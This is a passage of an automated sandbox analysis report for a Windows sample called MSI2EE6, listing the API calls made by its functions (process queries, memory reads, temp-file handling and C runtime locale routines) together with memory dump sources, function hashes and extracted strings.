                                                                          • Opcode ID: 404454db292973b160da5bdde8838827a7c23d95c697e8fad5e8ec0b81f2ca77
                                                                          • Instruction ID: a2449600aff0c39d1dccda7c8ca1bbc9eb935b675c439bf8fe264dbeb9419c95
                                                                          • Opcode Fuzzy Hash: 404454db292973b160da5bdde8838827a7c23d95c697e8fad5e8ec0b81f2ca77
                                                                          • Instruction Fuzzy Hash: 12B182B1D00388DFEB11DFA4C905BDEBBF4BF14304F1481AAE459AB282E7759A48CB51
                                                                          APIs
                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,5E20FB0F,?,00000000), ref: 00AD6BB5
                                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,5E20FB0F,?,00000000), ref: 00AD6BD6
                                                                          • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,5E20FB0F,?,00000000), ref: 00AD6C09
                                                                          • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,5E20FB0F,?,00000000), ref: 00AD6C1A
                                                                          • CloseHandle.KERNEL32(00000000,?,5E20FB0F,?,00000000), ref: 00AD6C38
                                                                          • CloseHandle.KERNEL32(00000000,?,5E20FB0F,?,00000000), ref: 00AD6C5C
                                                                          • CloseHandle.KERNEL32(00000000,?,5E20FB0F,?,00000000), ref: 00AD6C88
                                                                          • CloseHandle.KERNEL32(00000000,?,5E20FB0F,?,00000000), ref: 00AD6CA8
                                                                          • CloseHandle.KERNEL32(00000000,?,5E20FB0F,?,00000000), ref: 00AD6CCA
                                                                          • CloseHandle.KERNEL32(00000000,?,5E20FB0F,?,00000000), ref: 00AD6CEA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$Process$OpenTimes
                                                                          • String ID:
                                                                          • API String ID: 1711917922-0
                                                                          • Opcode ID: cd5a9f40f33c1013d63713a3a2b658946d5252bf3eeaca5c756ade967fede147
                                                                          • Instruction ID: f5d86717674087882c4f29d5e95b753fc1dcf7b8034e057b38b7a7ce6c1528c9
                                                                          • Opcode Fuzzy Hash: cd5a9f40f33c1013d63713a3a2b658946d5252bf3eeaca5c756ade967fede147
                                                                          • Instruction Fuzzy Hash: C1518F71D11218DFDB14CFA8DA887EEBBB4EF08714F24425AE926B7390DBB45900CB64
                                                                          APIs
                                                                          • GetTempFileNameW.KERNEL32(?,URL,00000000,?,5E20FB0F,?,00000004), ref: 00AD5A7A
                                                                          • LocalFree.KERNEL32(?), ref: 00AD5B8B
                                                                          • MoveFileW.KERNEL32(?,00000000), ref: 00AD5E2B
                                                                          • DeleteFileW.KERNEL32(?), ref: 00AD5E73
                                                                          • LocalFree.KERNEL32(?), ref: 00AD5F0D
                                                                          • LocalFree.KERNEL32(?), ref: 00AD5FC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: FileFreeLocal$DeleteMoveNameTemp
                                                                          • String ID: URL$url
                                                                          • API String ID: 1227976696-346267919
                                                                          • Opcode ID: eb6a9ff8e5177617bf52c12f467774eb8febe42aa8e1fcd13e786f16fc1a76aa
                                                                          • Instruction ID: 37e3fcbf9529bd2996fdf3b6c98005daf95fa5fb3f91595be4566057be546479
                                                                          • Opcode Fuzzy Hash: eb6a9ff8e5177617bf52c12f467774eb8febe42aa8e1fcd13e786f16fc1a76aa
                                                                          • Instruction Fuzzy Hash: C1026B70D146699ACB24DF24C998BADB7B1FF58304F1042DAE44AA7251EB74AFC4CF80
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF76A7
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC90D
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC930
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC958
                                                                            • Part of subcall function 00ADC8E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADCA01
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                          • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                          • API String ID: 1383202999-2891247106
                                                                          • Opcode ID: 1fcd0aa76b7fb85f7d678ea421d40c4830a02be8f14bf5c23310b55019c6e711
                                                                          • Instruction ID: 84ab0092b8b94f2534d28194405cab7980f6cbd1a235047844c664540bdacf9e
                                                                          • Opcode Fuzzy Hash: 1fcd0aa76b7fb85f7d678ea421d40c4830a02be8f14bf5c23310b55019c6e711
                                                                          • Instruction Fuzzy Hash: 98C15E7250820EAFDB18EFE8CD95DFE7BB9AB09344F154119FB46A7251D630DA10CB60
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF1B97
                                                                            • Part of subcall function 00AEA7B2: __EH_prolog3.LIBCMT ref: 00AEA7B9
                                                                            • Part of subcall function 00AEA7B2: std::_Lockit::_Lockit.LIBCPMT ref: 00AEA7C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3$LockitLockit::_std::_
                                                                          • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                          • API String ID: 2181796688-2891247106
                                                                          • Opcode ID: 98df03dac3e145f73b7d063627374c9f53bc76e8b51129924cd5ebb70167dc9e
                                                                          • Instruction ID: 09d73ca1f9c19e9cc18ef8268c634b3c0395b6703bb18db7921c34eb9e47808d
                                                                          • Opcode Fuzzy Hash: 98df03dac3e145f73b7d063627374c9f53bc76e8b51129924cd5ebb70167dc9e
                                                                          • Instruction Fuzzy Hash: 8AC15A7650010EEBDB18DFE8CA95DFA3BF8AB09704F14461AFB56E7251D6309A14CB60
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00AF1F87
                                                                            • Part of subcall function 00ADB810: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB83D
                                                                            • Part of subcall function 00ADB810: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB860
                                                                            • Part of subcall function 00ADB810: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB888
                                                                            • Part of subcall function 00ADB810: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB931
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                          • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                          • API String ID: 1383202999-2891247106
                                                                          • Opcode ID: 4fbb73263465ed80b19f03733091dc6294cd068c55cc41eaacaa606afe0a89e3
                                                                          • Instruction ID: fd7fdd0c73ac3720a5987486a4faace0dfa23e98121d4891a4318209adcb57eb
                                                                          • Opcode Fuzzy Hash: 4fbb73263465ed80b19f03733091dc6294cd068c55cc41eaacaa606afe0a89e3
                                                                          • Instruction Fuzzy Hash: E3C15FB650010EABDB29DFE8C956EFE7BF8EB09304F144259FB46A6251D630DA10CB61
                                                                          APIs
                                                                            • Part of subcall function 00AD6160: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00AD61C5
                                                                            • Part of subcall function 00AD6160: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,000000FF,00B1AA0D,000000FF), ref: 00AD621F
                                                                            • Part of subcall function 00AD6160: GetLastError.KERNEL32(?,?,?,000000FF,00B1AA0D,000000FF), ref: 00AD627B
                                                                          • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00AD6736
                                                                          • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000), ref: 00AD67A4
                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000), ref: 00AD680B
                                                                          • GetLastError.KERNEL32 ref: 00AD69BC
                                                                          • FreeLibrary.KERNEL32(?), ref: 00AD6A15
                                                                          Strings
                                                                          • NtQueryInformationProcess, xrefs: 00AD6730
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastLibraryMemoryProcessRead$AddressDirectoryFreeLoadProcSystem
                                                                          • String ID: NtQueryInformationProcess
                                                                          • API String ID: 1101900967-2781105232
                                                                          • Opcode ID: aead10cf49287ae717eeb6a1246a2bb26ad78deb4d2bb21aa7ddeb811a13baec
                                                                          • Instruction ID: d9afb9df5f62d53105d210c16dcb9811259e80712f259b558bdeb901ecf59ec4
                                                                          • Opcode Fuzzy Hash: aead10cf49287ae717eeb6a1246a2bb26ad78deb4d2bb21aa7ddeb811a13baec
                                                                          • Instruction Fuzzy Hash: ABB17F70D00749DADB20CF64C9497AEBBF4FF48308F20465EE449A7290D7B5AAC8CB91
                                                                          APIs
                                                                          • __EH_prolog3_GS.LIBCMT ref: 00AEE253
                                                                          • _Maklocstr.LIBCPMT ref: 00AEE2BC
                                                                          • _Maklocstr.LIBCPMT ref: 00AEE2CE
                                                                          • _Maklocchr.LIBCPMT ref: 00AEE2E6
                                                                          • _Maklocchr.LIBCPMT ref: 00AEE2F6
                                                                          • _Getvals.LIBCPMT ref: 00AEE318
                                                                            • Part of subcall function 00AE7E1C: _Maklocchr.LIBCPMT ref: 00AE7E4B
                                                                            • Part of subcall function 00AE7E1C: _Maklocchr.LIBCPMT ref: 00AE7E61
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                          • String ID: false$true
                                                                          • API String ID: 3549167292-2658103896
                                                                          • Opcode ID: 17115211f70056fd0b066aa4d34e437c6026909614cdde4a6158ee10c3389558
                                                                          • Instruction ID: f94d1511c178000539e28f6a55483311c65785a85f46204020e18220f46ca5b3
                                                                          • Opcode Fuzzy Hash: 17115211f70056fd0b066aa4d34e437c6026909614cdde4a6158ee10c3389558
                                                                          • Instruction Fuzzy Hash: 6E21A472D00358AADF14EFE5D986ADF7BB8EF04710F00845AF9199F152DB709944CBA1
                                                                          APIs
                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00AFD0C0
                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00AFD1CE
                                                                          • _UnwindNestedFrames.LIBCMT ref: 00AFD320
                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00AFD33B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 2751267872-393685449
                                                                          • Opcode ID: fe1d7d440aeae37d1f549865333803c57e22be509c5ebd8d8775f6fc3694bf05
                                                                          • Instruction ID: 082fe85579b0416abd7eac781e2b7552cc827abf09087b4ff4bf64779d27b03a
                                                                          • Opcode Fuzzy Hash: fe1d7d440aeae37d1f549865333803c57e22be509c5ebd8d8775f6fc3694bf05
                                                                          • Instruction Fuzzy Hash: 3EB16A7180020DEFCF26DFE4DA819BEBBB6AF14311F14465AFA156B202D731DA51CB91
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AE08DF
                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00AE0924
                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00AE099B
                                                                          • LocalFree.KERNEL32(?), ref: 00AE09D8
                                                                          • LocalFree.KERNEL32(?,?,?,?,?,5E20FB0F,5E20FB0F,?,?), ref: 00AE0B06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Local$AllocFree$___std_exception_copy
                                                                          • String ID: ios_base::failbit set$iostream
                                                                          • API String ID: 2276494016-302468714
                                                                          • Opcode ID: d70d11d5b48a263eb2d9cf4f8cdf0386dd67e4b3a7fc2348b68e481f47cb620b
                                                                          • Instruction ID: 1c86b91e2531c7d062ffddeb34673c3467f40149b62a353a41824f72e38d54d5
                                                                          • Opcode Fuzzy Hash: d70d11d5b48a263eb2d9cf4f8cdf0386dd67e4b3a7fc2348b68e481f47cb620b
                                                                          • Instruction Fuzzy Hash: 15A193B1D00249DFDB08DF69D985BADFBB5FF44310F10826AE815AB392D7709984CB91
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,00000044,5E20FB0F,00000000,?), ref: 00ADBDCB
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADBE08
                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADBE75
                                                                          • __Getctype.LIBCPMT ref: 00ADBEBE
                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADBF32
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADBFEF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                          • String ID: bad locale name
                                                                          • API String ID: 3635123611-1405518554
                                                                          • Opcode ID: cd5a1e8671f3ba0c29d38e088a2a8ea6c9645781da41db6d8fad28a9739ac2fe
                                                                          • Instruction ID: 1ca6a2647b131347c84f76afa1a25a1ebe7753e0bd22eb0ddfbc619583d46cc8
                                                                          • Opcode Fuzzy Hash: cd5a1e8671f3ba0c29d38e088a2a8ea6c9645781da41db6d8fad28a9739ac2fe
                                                                          • Instruction Fuzzy Hash: 6E81B1B1D04388DFEB10DFA8C944B9EBBF4AF15314F248199D449AB382EB75DA44CB61
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,00000018,5E20FB0F,00000000,?,?,?,?,?,?,?,?,00000000,00B1BA75,000000FF), ref: 00ADC5A4
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5DE
                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADC642
                                                                          • __Getctype.LIBCPMT ref: 00ADC68B
                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADC6D1
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC785
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                          • String ID: bad locale name
                                                                          • API String ID: 3635123611-1405518554
                                                                          • Opcode ID: 339e3546613d0aaf9b3bb3a689c3743b37481811e662260ee0b15140246fa00c
                                                                          • Instruction ID: 21bea2fe9f55771efe414780f3745eb6fe64d60a31bdca0e6922dafc5f37a05b
                                                                          • Opcode Fuzzy Hash: 339e3546613d0aaf9b3bb3a689c3743b37481811e662260ee0b15140246fa00c
                                                                          • Instruction Fuzzy Hash: 8A619DB0D01289DFEB10DFE8CA04BCEBBF4AF15314F148199E455AB381E7B59A04DB51
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00AF930F
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AF939B
                                                                          • __alloca_probe_16.LIBCMT ref: 00AF93C5
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AF9406
                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00AF9422
                                                                          • __alloca_probe_16.LIBCMT ref: 00AF9448
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AF9485
                                                                          • CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00AF94A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                          • String ID:
                                                                          • API String ID: 3603178046-0
                                                                          • Opcode ID: 318c9d199c676c046218f5f0cf206623a40ca7392a5426753d36f1e74fa58779
                                                                          • Instruction ID: 0bb55209c57bc2ec7f34e162e416bad69236db709a608b7667eaad176981506e
                                                                          • Opcode Fuzzy Hash: 318c9d199c676c046218f5f0cf206623a40ca7392a5426753d36f1e74fa58779
                                                                          • Instruction Fuzzy Hash: C6719B3290021DABDF219FE4CC81BFFBBB9AF19311F154159FA54AB291DA359C05CBA0
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,CCCCCCCC,00ADCA2F,?,00000001,00000000,00000000,?,?,00ADCA2F,?), ref: 00AF8DB2
                                                                          • __alloca_probe_16.LIBCMT ref: 00AF8DDE
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,00ADCA2F,?,?,00000000,00ADD083,0000003F,?), ref: 00AF8E1D
                                                                          • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADCA2F,?,?,00000000,00ADD083,0000003F), ref: 00AF8E3A
                                                                          • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00ADCA2F,?,?,00000000,00ADD083,0000003F), ref: 00AF8E79
                                                                          • __alloca_probe_16.LIBCMT ref: 00AF8E96
                                                                          • LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADCA2F,?,?,00000000,00ADD083,0000003F), ref: 00AF8ED8
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,00ADCA2F,?,?,00000000,00ADD083,0000003F,?), ref: 00AF8EFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                          • String ID:
                                                                          • API String ID: 2040435927-0
                                                                          • Opcode ID: 43b4f66252a396d1e3f7c90fcb5103ccab8d41b8d05366b3fab48f91b7a64999
                                                                          • Instruction ID: 9e71bc0e87ac5ad9dc86d9ab228ddc85514a731c9cacb0c4078443c0b7ebcb0c
                                                                          • Opcode Fuzzy Hash: 43b4f66252a396d1e3f7c90fcb5103ccab8d41b8d05366b3fab48f91b7a64999
                                                                          • Instruction Fuzzy Hash: 8A517E7260020AAFEB219F94CC45FBB7BBAEF44754F254425FA15A6190EB38DD10CBA0
                                                                          APIs
                                                                          • LocalAlloc.KERNEL32(00000040,0000000C,5E20FB0F,00000000,?,00000000,?,?,?,?,00000000,00B1C141,000000FF,?,00ADEBDA,00000000), ref: 00ADFB94
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00ADFBCA
                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADFC2E
                                                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADFCEE
                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADFDA2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: std::_$Locinfo::_Lockit$AllocLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                          • String ID: bad locale name
                                                                          • API String ID: 2968629171-1405518554
                                                                          • Opcode ID: 14688db57300f87cea62ea3de93b83e543c650cc6c14da8c8a75d463d19461f0
                                                                          • Instruction ID: aca30e822cd071641ffff3475dfe8db35372603f2ea942ecd4fe06b2234840dc
                                                                          • Opcode Fuzzy Hash: 14688db57300f87cea62ea3de93b83e543c650cc6c14da8c8a75d463d19461f0
                                                                          • Instruction Fuzzy Hash: C2716CB1D01288DFEB11DFE8C944BDEBBF4AF11314F1441AAE455AB381D7B59A04CBA1
                                                                          APIs
